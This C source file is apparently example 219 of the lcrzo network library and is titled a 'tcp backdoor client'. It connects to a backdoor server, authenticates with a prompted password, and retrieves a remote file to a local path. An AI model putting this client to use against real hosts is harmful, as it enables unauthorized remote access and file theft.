
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000219=
{ /*reference*/     "lcrzoex", 219,
  /*version*/       1, 0,
  /*title*/         "tcp backboor client [get]",
  /*french title*/  "client tcp backdoor [get]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port distantfile localfile",
  /*french usage*/  "nom_serveur port_serveur fichierdistant fichierlocal",
  /*usage example*/ "1.2.3.4 1234 /tmp/file /tmp/filehere",
  /*fr. usage ex.*/ "1.2.3.4 1234 /tmp/fichier /tmp/fichierici",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000219_main(int argc, char *argv[]);
int lcrzoex_000217_auth(lcrzo_sock *psock, lcrzo_conststring password);
int lcrzoex_000217_quit(lcrzo_sock *psock, 
			lcrzo_conststring parameters);
int lcrzoex_000217_get(lcrzo_sock *psock, 
		       lcrzo_conststring parameters);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000219_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_sock sock;
  lcrzo_string passwd, parameters;
  
  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000219, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize addresses */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));

  /* initialize the client */
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, (lcrzo_uint16)atoi(argv[2]), &sock));

  /* authenticate */
  lcrzo_epr(lcrzo_string_initm_text_passwd("Passwd", "", &passwd));
  lcrzo_epr(lcrzoex_000217_auth(&sock, passwd));
  lcrzo_epr(lcrzo_string_free(passwd));

  /* exec */
  lcrzo_epr(lcrzo_string_initm_text(argv[3], &parameters));
  lcrzo_epr(lcrzo_string_appendm_text(" ", &parameters));
  lcrzo_epr(lcrzo_string_appendm_text(argv[4], &parameters));
  lcrzo_epr(lcrzoex_000217_get(&sock, parameters));
  lcrzo_epr(lcrzo_string_free(parameters));

  /* quit */
  lcrzo_epr(lcrzoex_000217_quit(&sock, ""));

  /* close the client */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}
